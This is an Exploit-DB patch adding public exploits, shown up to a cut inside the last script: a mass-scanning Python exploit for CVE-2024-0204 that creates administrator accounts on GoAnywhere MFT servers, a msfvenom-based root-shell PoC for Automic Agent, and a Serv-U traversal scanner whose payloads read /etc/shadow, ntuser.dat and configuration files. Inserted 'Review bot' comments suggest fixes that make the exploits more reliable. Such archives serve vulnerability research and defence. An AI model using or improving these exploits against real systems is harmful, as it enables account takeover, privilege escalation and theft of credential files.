From c3b152279e29d5427af997886003f9873a9caf95 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 30 May 2025 00:16:26 +0000 Subject: [PATCH] DB: 2025-05-30 7 changes to exploits/shellcodes/ghdb Automic Agent 24.3.0 HF4 - Privilege Escalation Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal Campcodes Online Hospital Management System 1.0 - SQL Injection WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure --- exploits/multiple/remote/52308.py | 338 +++++++++++++++++++++++ exploits/multiple/remote/52309.txt | 13 + exploits/multiple/remote/52311.py | 408 ++++++++++++++++++++++++++++ exploits/multiple/webapps/52307.txt | 74 +++++ exploits/multiple/webapps/52312.txt | 72 +++++ exploits/windows/remote/52310.py | 85 ++++++ files_exploits.csv | 6 + 7 files changed, 996 insertions(+) create mode 100755 exploits/multiple/remote/52308.py create mode 100644 exploits/multiple/remote/52309.txt create mode 100755 exploits/multiple/remote/52311.py create mode 100644 exploits/multiple/webapps/52307.txt create mode 100644 exploits/multiple/webapps/52312.txt create mode 100755 exploits/windows/remote/52310.py diff --git a/exploits/multiple/remote/52308.py b/exploits/multiple/remote/52308.py new file mode 100755 index 000000000..8c18d1786 --- /dev/null +++ b/exploits/multiple/remote/52308.py 
@@ -0,0 +1,338 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass +# Date: 2025-05-25 +# Exploit Author: @ibrahimsql +# Exploit Author's github: https://github.com/ibrahimsql +# Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft +# Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial +# Version: < 7.4.1 +# Tested on: Kali Linux 2024.1 +# CVE: CVE-2024-0204 +# Description: +# Fortra GoAnywhere MFT versions prior to 7.4.1 contain a critical authentication bypass vulnerability +# that allows unauthenticated attackers to create an administrator account by exploiting a path traversal +# vulnerability to access the initial account setup wizard. This exploit demonstrates two different +# path traversal techniques to maximize successful exploitation across various server configurations. +# +# References: +# - https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/ +# - https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability +# - https://nvd.nist.gov/vuln/detail/cve-2024-0204 + +import argparse +import concurrent.futures +import os +import socket +import sys +from typing import List, Dict, Tuple, Optional, Union + +import requests +from bs4 import BeautifulSoup +from colorama import Fore, Style, init + +# Initialize colorama for cross-platform colored output +init(autoreset=True) + +# Disable SSL warnings +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +# Constants +DEFAULT_TIMEOUT = 10 +MAX_THREADS = 10 +USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" +PRIMARY_EXPLOIT_PATH = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml" +SECONDARY_EXPLOIT_PATH = 
"/goanywhere/..;/wizard/InitialAccountSetup.xhtml" + + +class Banner: + @staticmethod + def show(): + banner = f"""{Fore.CYAN} + ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ +██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔═████╗╚════██╗██╔═████╗██║ ██║ +██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗██║██╔██║ █████╔╝██║██╔██║███████║ +██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝████╔╝██║██╔═══╝ ████╔╝██║╚════██║ +╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ╚██████╔╝███████╗╚██████╔╝ ██║ + ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═╝ +{Style.RESET_ALL} +{Fore.GREEN}CVE-2024-0204 Exploit v1.0{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql{Style.RESET_ALL} +""" + print(banner) + + +class GoAnywhereExploit: + def __init__(self, username: str, password: str, timeout: int = DEFAULT_TIMEOUT): + self.username = username + self.password = password + self.timeout = timeout + self.headers = {"User-Agent": USER_AGENT} + self.vulnerable_targets = [] + self.non_vulnerable_targets = [] + self.error_targets = [] + + def check_target(self, target: str) -> Dict: + """ + Check if target is vulnerable to CVE-2024-0204 and attempt to create an admin account + + Args: + target: The target URL/domain to check + + Returns: + Dict containing result information + """ + result = { + "target": target, + "vulnerable": False, + "message": "", + "admin_created": False, + "error": None + } + + # Try primary exploit path first + primary_result = self._try_exploit_path(target, PRIMARY_EXPLOIT_PATH) + if primary_result["vulnerable"]: + return primary_result + + # If primary path failed, try secondary exploit path + print(f"{Fore.BLUE}[*] {Style.RESET_ALL}Primary exploit path failed, trying alternative path...") + secondary_result = self._try_exploit_path(target, SECONDARY_EXPLOIT_PATH) + if secondary_result["vulnerable"]: + return secondary_result + + # If both 
paths failed, target is not vulnerable + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable to CVE-2024-0204") + result["message"] = "Not vulnerable to CVE-2024-0204" + self.non_vulnerable_targets.append(target) + return result + + def _try_exploit_path(self, target: str, exploit_path: str) -> Dict: + """ + Try to exploit the target using a specific exploit path + + Args: + target: Target to exploit + exploit_path: Path to use for exploitation + + Returns: + Dict with exploitation results + """ + result = { + "target": target, + "vulnerable": False, + "message": "", + "admin_created": False, + "error": None + } + + try: + url = f"https://{target}{exploit_path}" + session = requests.Session() + + # Initial check for vulnerability + response = session.get( + url, + headers=self.headers, + verify=False, + timeout=self.timeout + ) + + # Determine if target is vulnerable based on response + if response.status_code == 401: + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable via {exploit_path} (401 Unauthorized)") + result["message"] = "Not vulnerable (401 Unauthorized)" + return result + + if response.status_code != 200: + print(f"{Fore.YELLOW}[?] {Style.RESET_ALL}{target} - Unexpected response via {exploit_path} (Status: {response.status_code})") + result["message"] = f"Unexpected response (Status: {response.status_code})" + return result + + # Target is potentially vulnerable + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Potentially vulnerable via {exploit_path}!") + result["vulnerable"] = True + self.vulnerable_targets.append(target) + + # Extract ViewState token for the form submission + try: + soup = BeautifulSoup(response.text, "html.parser") + view_state = soup.find('input', {'name': 'javax.faces.ViewState'}) + + if not view_state or not view_state.get('value'): + print(f"{Fore.YELLOW}[!] 
{Style.RESET_ALL}{target} - Could not extract ViewState token via {exploit_path}") + result["message"] = "Could not extract ViewState token" + return result + + # Prepare data for admin account creation + data = { + "j_id_u:creteAdminGrid:username": self.username, + "j_id_u:creteAdminGrid:password_hinput": self.password, + "j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", + "j_id_u:creteAdminGrid:confirmPassword_hinput": self.password, + "j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", + "j_id_u:creteAdminGrid:submitButton": "", + "createAdminForm_SUBMIT": 1, + "javax.faces.ViewState": view_state['value'] + } + + # Attempt to create admin account + create_response = session.post( + url, + headers=self.headers, + data=data, + verify=False, + timeout=self.timeout + ) + + if create_response.status_code == 200: + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Admin account created successfully via {exploit_path}! Username: {self.username}, Password: {self.password}") + result["admin_created"] = True + result["message"] = f"Admin account created successfully! Username: {self.username}, Password: {self.password}" + else: + print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Failed to create admin account via {exploit_path} (Status: {create_response.status_code})") + result["message"] = f"Failed to create admin account (Status: {create_response.status_code})" + + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error extracting form data: {str(e)}") + result["message"] = f"Error extracting form data: {str(e)}" + result["error"] = str(e) + + except requests.exceptions.ConnectTimeout: + print(f"{Fore.YELLOW}[!] 
{Style.RESET_ALL}{target} - Connection timeout") + result["message"] = "Connection timeout" + result["error"] = "Connection timeout" + self.error_targets.append(target) + + except requests.exceptions.ConnectionError: + print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection error") + result["message"] = "Connection error" + result["error"] = "Connection error" + self.error_targets.append(target) + + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error: {str(e)}") + result["message"] = f"Error: {str(e)}" + result["error"] = str(e) + self.error_targets.append(target) + + return result + + def scan_targets(self, targets: List[str]) -> None: + """ + Scan multiple targets concurrently + + Args: + targets: List of targets to scan + """ + with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: + executor.map(self.check_target, targets) + + def load_targets_from_file(self, file_path: str) -> List[str]: + """ + Load targets from a file + + Args: + file_path: Path to the file containing targets + + Returns: + List of targets + """ + if not os.path.exists(file_path): + print(f"{Fore.RED}[!] {Style.RESET_ALL}File not found: {file_path}") + return [] + + try: + with open(file_path, "r") as f: + return [line.strip() for line in f if line.strip()] + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error reading file: {str(e)}") + return [] + + def print_summary(self) -> None: + """Print a summary of the scanning results""" + print(f"\n{Fore.CYAN}[*] {Style.RESET_ALL}Scan Summary:") + print(f"{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets: {len(self.vulnerable_targets)}") + print(f"{Fore.RED}[-] {Style.RESET_ALL}Non-vulnerable targets: {len(self.non_vulnerable_targets)}") + print(f"{Fore.YELLOW}[!] 
{Style.RESET_ALL}Error targets: {len(self.error_targets)}") + + if self.vulnerable_targets: + print(f"\n{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets:") + for target in self.vulnerable_targets: + print(f" - {target}") + + +def validate_args(args): + """Validate command line arguments""" + if not args.target and not args.file: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify either a target (-t) or a file (-f)") + return False + + if args.file and not os.path.exists(args.file): + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: File not found: {args.file}") + return False + + if not args.username or not args.password: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify both username (-u) and password (-p)") + return False + + return True + + +def main(): + """Main function""" + parser = argparse.ArgumentParser(description="CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit") + + parser.add_argument('-t', '--target', help="Target host to check (e.g., 'example.com' or '192.168.1.1')") + parser.add_argument('-f', '--file', help="File containing targets, one per line") + parser.add_argument('-u', '--username', help="Username for the admin account to create") + parser.add_argument('-p', '--password', help="Password for the admin account to create") + parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT, help=f"Connection timeout in seconds (default: {DEFAULT_TIMEOUT})") + parser.add_argument('--threads', type=int, default=MAX_THREADS, help=f"Number of concurrent threads for scanning (default: {MAX_THREADS})") + + args = parser.parse_args() + + # Show banner + Banner.show() + + # Validate arguments + if not validate_args(args): + parser.print_help() + sys.exit(1) + + # Initialize exploit + exploit = GoAnywhereExploit( + username=args.username, + password=args.password, + timeout=args.timeout + ) + + # Handle single target + if args.target: + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Checking single target: 
{args.target}") + exploit.check_target(args.target) + + # Handle targets from file + elif args.file: + targets = exploit.load_targets_from_file(args.file) + if not targets: + print(f"{Fore.RED}[!] {Style.RESET_ALL}No valid targets found in the file") + sys.exit(1) + + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Loaded {len(targets)} targets from file") + print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Starting scan with {args.threads} threads...\n") + + exploit.scan_targets(targets) + + # Print summary + exploit.print_summary() + + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + print(f"\n{Fore.YELLOW}[!] {Style.RESET_ALL}Scan interrupted by user") + sys.exit(0) + except Exception as e: + print(f"{Fore.RED}[!] {Style.RESET_ALL}Unhandled error: {str(e)}") + sys.exit(1) \ No newline at end of file diff --git a/exploits/multiple/remote/52309.txt b/exploits/multiple/remote/52309.txt new file mode 100644 index 000000000..81d4d1c33 --- /dev/null +++ b/exploits/multiple/remote/52309.txt @@ -0,0 +1,13 @@ +# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation +# Date: 26.05.2025 +# Exploit Author: Flora Schäfer +# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation +# Version: <24.3.0 HF4, <21.0.13 HF1 +# Tested on: Linux +# CVE : CVE-2025-4971 + +1. Generate shared object file using msfvenom +$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so + +2. Run the ucxjlx6 executable as follows +$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep") \ No newline at end of file diff --git a/exploits/multiple/remote/52311.py b/exploits/multiple/remote/52311.py new file mode 100755 index 000000000..28be25c70 --- /dev/null +++ b/exploits/multiple/remote/52311.py 
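Review bot: In `_try_exploit_path`, `result["vulnerable"] = True` and `self.vulnerable_targets.append(target)` run as soon as the GET returns 200, before the page is checked for the setup form, so any catch-all 200 (login page, WAF block page, a patched instance that renders something else at that path) is reported as vulnerable, and when the ViewState lookup then fails the function still returns `vulnerable: True`, which makes `check_target` stop there instead of trying the secondary path. Move those two lines below the `if not view_state or not view_state.get('value'):` guard and gate them on the form actually being present, e.g. `if not view_state or not soup.find('form', {'id': 'createAdminForm'}): return result` (the form id presumably matches the `createAdminForm_SUBMIT` field the POST sends). `admin_created` is likewise inferred from a 200 on the POST, but a JSF page returns 200 on validation errors too; at least check that the `javax.faces.ViewState` form is gone from `create_response.text`, or that a login with the new credentials succeeds, before printing "created successfully". Separately, `--threads` is parsed but `scan_targets` always uses `MAX_THREADS`; pass `max_workers=args.threads` through.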
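Review bot: The PoC never states the precondition it depends on: `ucxjlx6` has to be installed setuid root (or otherwise run with an elevated effective uid), because the `PrependSetuid=True` stub only calls setuid(0), which fails in an unprivileged process, so loading `/tmp/sh.so` into a process owned by the invoking user gains nothing. Add a step 0 such as `$ ls -l ucxjlx6   # expect the s bit: -rwsr-xr-x root` and say which user owns the agent binary on an affected install. `PrependSetguid=True` also looks like a typo for `PrependSetgid=True`; as far as I know msfvenom does not reject an unknown datastore key, so the group id would silently stay unchanged — worth confirming with `msfvenom -p linux/x64/exec --list-options`. The `ini=<(...)` process substitution is bash-specific, so note that `sh`/`dash` will not run the command as written.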
@@ -0,0 +1,408 @@ +# Exploit Title: SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal +# Date: 2025-05-28 +# Exploit Author: @ibrahimsql +# Exploit Author's github: https://github.com/ibrahimsql +# Vendor Homepage: https://www.solarwinds.com/serv-u-managed-file-transfer-server +# Software Link: https://www.solarwinds.com/serv-u-managed-file-transfer-server/registration +# Version: <= 15.4.2 HF1 +# Tested on: Kali Linux 2024.1 +# CVE: CVE-2024-28995 +# Description: +# SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow +# attackers to read sensitive files on the host machine. This exploit demonstrates multiple +# path traversal techniques to access Serv-U log files and other system files on both +# Windows and Linux systems. +# +# References: +# - https://nvd.nist.gov/vuln/detail/cve-2024-28995 +# - https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/ +# - https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html + +# Requirements: urllib3>=1.26.0 , colorama>=0.4.4 , requests>=2.25.0 + + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import argparse +import concurrent.futures +import json +import os +import re +import sys +import time +from concurrent.futures import ThreadPoolExecutor, as_completed +from urllib.parse import urlparse + +import requests +from colorama import Fore, Back, Style, init + +# Initialize colorama +init(autoreset=True) + +# Disable SSL warnings +try: + import urllib3 + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) +except ImportError: + pass + +BASE_DIR = os.path.dirname(os.path.abspath(__file__)) + +BANNER = rf''' +{Fore.CYAN} + ______ _______ ____ ___ ____ _ _ ____ ___ ___ ___ ____ + / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \( _ )/ _ \ / _ \| ___| + | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) / _ \ (_) | (_) |___ \ + | |___ \ V / | |__|_____/ __/| 
|_| / __/|__ _|_____/ __/ (_) \__, |\__, |___) | + \____| \_/ |_____| |_____|\___/_____| |_| |_____\___/ /_/ /_/|____/ +{Fore.YELLOW} + SolarWinds Serv-U Directory Traversal Exploit +{Fore.RED} CVE-2024-28995 by @ibrahimsql +{Style.RESET_ALL} +''' + +class ScanResult: + def __init__(self, url, is_vulnerable=False, version=None, os_type=None, file_content=None, path=None): + self.url = url + self.is_vulnerable = is_vulnerable + self.version = version + self.os_type = os_type + self.file_content = file_content + self.path = path + self.timestamp = time.strftime("%Y-%m-%d %H:%M:%S") + + def to_dict(self): + return { + "url": self.url, + "is_vulnerable": self.is_vulnerable, + "version": self.version, + "os_type": self.os_type, + "path": self.path, + "timestamp": self.timestamp + } + +def print_banner(): + print(BANNER) + +def normalize_url(url): + """Normalize URL to ensure it has http/https protocol.""" + if not url.startswith('http'): + url = f"https://{url}" + return url.rstrip('/') + +def extract_server_version(headers): + """Extract Serv-U version from server headers if available.""" + if 'Server' in headers: + server_header = headers['Server'] + # Look for Serv-U version pattern + match = re.search(r'Serv-U/(\d+\.\d+\.\d+)', server_header) + if match: + return match.group(1) + return None + +def is_vulnerable_version(version): + """Check if the detected version is vulnerable (15.4.2 HF1 or lower).""" + if not version: + return None + + try: + # Split version numbers + major, minor, patch = map(int, version.split('.')) + + # Vulnerable if lower than 15.4.2 HF2 + if major < 15: + return True + elif major == 15: + if minor < 4: + return True + elif minor == 4: + if patch <= 2: # We're assuming patch 2 is 15.4.2 HF1 which is vulnerable + return True + except: + pass + + return False + +def get_request(url, timeout=15): + """Make a GET request to the specified URL.""" + try: + response = requests.get(url, verify=False, timeout=timeout, allow_redirects=False) + return 
response + except requests.RequestException as e: + return None + +def detect_os_type(content): + """Detect the operating system type from the file content.""" + if any(indicator in content for indicator in ["root:", "bin:x:", "daemon:", "/etc/", "/home/", "/var/"]): + return "Linux" + elif any(indicator in content for indicator in ["[fonts]", "[extensions]", "[Mail]", "Windows", "ProgramData", "Program Files"]): + return "Windows" + return None + +def get_default_payloads(): + """Return a list of directory traversal payloads specific to CVE-2024-28995.""" + return [ + # Windows payloads - Serv-U specific files + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log"}, + {"path": "/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/^&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\ProgramData\\RhinoSoft\\Serv-U\\&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt2"}, + {"path": "/?InternalDir=../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt3"}, + {"path": "/?InternalDir=../../../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Deep"}, + + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUStartupLog.txt", "name": "Serv-U Startup Log Alt4"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.Log", "name": "Serv-U Log"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServULog.txt", "name": "Serv-U Log Alt"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUErrorLog.txt", "name": "Serv-U Error Log"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-ErrorLog.txt", "name": "Serv-U Error Log Alt"}, + {"path": 
"/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.ini", "name": "Serv-U Config"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUAdmin.ini", "name": "Serv-U Admin Config"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=Users.txt", "name": "Serv-U Users"}, + {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=UserAccounts.txt", "name": "Serv-U User Accounts"}, + + # Verify Windows with various system files + {"path": "/?InternalDir=/../../../../windows&InternalFile=win.ini", "name": "Windows ini"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\windows&InternalFile=win.ini", "name": "Windows ini Alt"}, + {"path": "/?InternalDir=../../../../windows&InternalFile=win.ini", "name": "Windows ini Alt2"}, + {"path": "/?InternalDir=../../../../../../windows&InternalFile=win.ini", "name": "Windows ini Deep"}, + {"path": "/?InternalDir=/./../../../Windows/system.ini", "name": "Windows system.ini"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=drivers.ini", "name": "Windows drivers.ini"}, + {"path": "/?InternalDir=/./../../../Windows/System32/drivers/etc/&InternalFile=hosts", "name": "Windows hosts"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=config.nt", "name": "Windows config.nt"}, + {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=ntuser.dat", "name": "Windows ntuser.dat"}, + {"path": "/?InternalDir=/./../../../Windows/boot.ini", "name": "Windows boot.ini"}, + + # Verify Linux with various system files + {"path": "/?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd", "name": "Linux passwd"}, + {"path": "/?InternalDir=/../../../../etc^&InternalFile=passwd", "name": "Linux passwd Alt"}, + {"path": "/?InternalDir=\\..\\..\\..\\..\\etc/passwd", "name": "Linux passwd Alt2"}, + {"path": "/?InternalDir=../../../../etc&InternalFile=passwd", "name": "Linux passwd Alt3"}, + 
{"path": "/?InternalDir=../../../../../../etc&InternalFile=passwd", "name": "Linux passwd Deep"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=shadow", "name": "Linux shadow"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=hosts", "name": "Linux hosts"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=hostname", "name": "Linux hostname"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=issue", "name": "Linux issue"}, + {"path": "/?InternalDir=/./../../../etc/&InternalFile=os-release", "name": "Linux os-release"} + ] + +def create_custom_payload(directory, filename): + """Create a custom payload with the specified directory and filename.""" + # Try both encoding styles + payloads = [ + {"path": f"/?InternalDir=/./../../../{directory}&InternalFile=(unknown)", "name": f"Custom (unknown)"}, + {"path": f"/?InternalDir=/../../../../{directory}^&InternalFile=(unknown)", "name": f"Custom (unknown) Alt"}, + {"path": f"/?InternalDir=\\..\\..\\..\\..\\{directory}&InternalFile=(unknown)", "name": f"Custom (unknown) Alt2"} + ] + return payloads + +def load_wordlist(wordlist_path): + """Load custom paths from a wordlist file.""" + payloads = [] + try: + with open(wordlist_path, 'r') as f: + for line in f: + line = line.strip() + if line and not line.startswith('#'): + # Check if the line contains a directory and file separated by a delimiter + if ':' in line: + directory, filename = line.split(':', 1) + payloads.extend(create_custom_payload(directory, filename)) + else: + # Assume it's a complete path + payloads.append({"path": line, "name": f"Wordlist: {line[:20]}..."}) + return payloads + except Exception as e: + print(f"{Fore.RED}[!] 
Error loading wordlist: {e}{Style.RESET_ALL}") + return [] + +def scan_target(url, custom_payloads=None): + """Scan a target URL for the CVE-2024-28995 vulnerability.""" + url = normalize_url(url) + result = ScanResult(url) + + # Try to get server version first + try: + response = get_request(url) + if response and response.headers: + result.version = extract_server_version(response.headers) + vulnerable_version = is_vulnerable_version(result.version) + + if vulnerable_version is False: + print(f"{Fore.YELLOW}[*] {url} - Serv-U version {result.version} appears to be patched{Style.RESET_ALL}") + # Still continue scanning as version detection may not be reliable + except Exception as e: + pass + + # Get all payloads to try + payloads = get_default_payloads() + if custom_payloads: + payloads.extend(custom_payloads) + + # Try each payload + for payload in payloads: + full_url = f"{url}{payload['path']}" + try: + print(f"{Fore.BLUE}[*] Trying: {payload['name']} on {url}{Style.RESET_ALL}") + response = get_request(full_url) + + if response and response.status_code == 200: + content = response.text + + # Check if the response contains meaningful content + if len(content) > 100: # Arbitrary threshold to filter out error pages + os_type = detect_os_type(content) + if os_type: + result.is_vulnerable = True + result.os_type = os_type + result.file_content = content + result.path = payload['path'] + + print(f"{Fore.GREEN}[+] {Fore.RED}VULNERABLE: {url} - {payload['name']} - Detected {os_type} system{Style.RESET_ALL}") + + # Successful match - no need to try more payloads + return result + except Exception as e: + continue + + if not result.is_vulnerable: + print(f"{Fore.RED}[-] Not vulnerable: {url}{Style.RESET_ALL}") + + return result + +def scan_multiple_targets(targets, custom_dir=None, custom_file=None, wordlist=None): + """Scan multiple targets using thread pool.""" + results = [] + custom_payloads = [] + + # Add custom payloads if specified + if custom_dir and 
custom_file: + custom_payloads.extend(create_custom_payload(custom_dir, custom_file)) + + # Add wordlist payloads if specified + if wordlist: + custom_payloads.extend(load_wordlist(wordlist)) + + print(f"{Fore.CYAN}[*] Starting scan of {len(targets)} targets with {len(custom_payloads) + len(get_default_payloads())} payloads{Style.RESET_ALL}") + + # Use fixed thread count of 10 + with ThreadPoolExecutor(max_workers=10) as executor: + future_to_url = {executor.submit(scan_target, target, custom_payloads): target for target in targets} + + for future in as_completed(future_to_url): + try: + result = future.result() + results.append(result) + except Exception as e: + print(f"{Fore.RED}[!] Error scanning {future_to_url[future]}: {e}{Style.RESET_ALL}") + + return results + +def save_results(results, output_file): + """Save scan results to a JSON file.""" + output_data = [result.to_dict() for result in results] + + try: + with open(output_file, 'w') as f: + json.dump(output_data, f, indent=2) + print(f"{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}") + except Exception as e: + print(f"{Fore.RED}[!] 
Error saving results: {e}{Style.RESET_ALL}") + +def save_vulnerable_content(result, output_dir): + """Save the vulnerable file content to a file.""" + if not os.path.exists(output_dir): + os.makedirs(output_dir) + + # Create a safe filename from the URL + parsed_url = urlparse(result.url) + safe_filename = f"{parsed_url.netloc.replace(':', '_')}.txt" + output_path = os.path.join(output_dir, safe_filename) + + try: + with open(output_path, 'w') as f: + f.write(f"URL: {result.url}\n") + f.write(f"Path: {result.path}\n") + f.write(f"Version: {result.version or 'Unknown'}\n") + f.write(f"OS Type: {result.os_type or 'Unknown'}\n") + f.write(f"Timestamp: {result.timestamp}\n") + f.write("\n--- File Content ---\n") + f.write(result.file_content) + + print(f"{Fore.GREEN}[+] Saved vulnerable content to {output_path}{Style.RESET_ALL}") + except Exception as e: + print(f"{Fore.RED}[!] Error saving content: {e}{Style.RESET_ALL}") + +def main(): + parser = argparse.ArgumentParser(description="CVE-2024-28995 - SolarWinds Serv-U Directory Traversal Scanner") + parser.add_argument("-u", "--url", help="Target URL") + parser.add_argument("-f", "--file", help="File containing a list of URLs to scan") + parser.add_argument("-d", "--dir", help="Custom directory path to read (e.g., ProgramData/RhinoSoft/Serv-U/)") + parser.add_argument("-n", "--filename", help="Custom filename to read (e.g., Serv-U-StartupLog.txt)") + parser.add_argument("-w", "--wordlist", help="Path to wordlist containing custom paths to try") + parser.add_argument("-o", "--output", help="Output JSON file to save results") + + args = parser.parse_args() + + print_banner() + + # Validate arguments + if not args.url and not args.file: + parser.print_help() + print(f"\n{Fore.RED}[!] 
Error: Either -u/--url or -f/--file is required{Style.RESET_ALL}") + sys.exit(1) + + targets = [] + + # Get targets + if args.url: + targets.append(args.url) + + if args.file: + try: + with open(args.file, "r") as f: + targets.extend([line.strip() for line in f.readlines() if line.strip()]) + except Exception as e: + print(f"{Fore.RED}[!] Error reading file {args.file}: {e}{Style.RESET_ALL}") + sys.exit(1) + + # Deduplicate targets + targets = list(set(targets)) + + if not targets: + print(f"{Fore.RED}[!] No valid targets provided.{Style.RESET_ALL}") + sys.exit(1) + + print(f"{Fore.CYAN}[*] Loaded {len(targets)} target(s){Style.RESET_ALL}") + + # Set output file + output_file = args.output or f"cve_2024_28995_results_{time.strftime('%Y%m%d_%H%M%S')}.json" + + # Start scanning + results = scan_multiple_targets(targets, args.dir, args.filename, args.wordlist) + + # Process results + vulnerable_count = sum(1 for result in results if result.is_vulnerable) + + print(f"\n{Fore.CYAN}[*] Scan Summary:{Style.RESET_ALL}") + print(f"{Fore.CYAN}[*] Total targets: {len(results)}{Style.RESET_ALL}") + print(f"{Fore.GREEN if vulnerable_count > 0 else Fore.RED}[*] Vulnerable targets: {vulnerable_count}{Style.RESET_ALL}") + + # Save results + save_results(results, output_file) + + # Save vulnerable file contents + for result in results: + if result.is_vulnerable and result.file_content: + save_vulnerable_content(result, "vulnerable_files") + + print(f"\n{Fore.GREEN}[+] Scan completed successfully!{Style.RESET_ALL}") + +if __name__ == "__main__": + try: 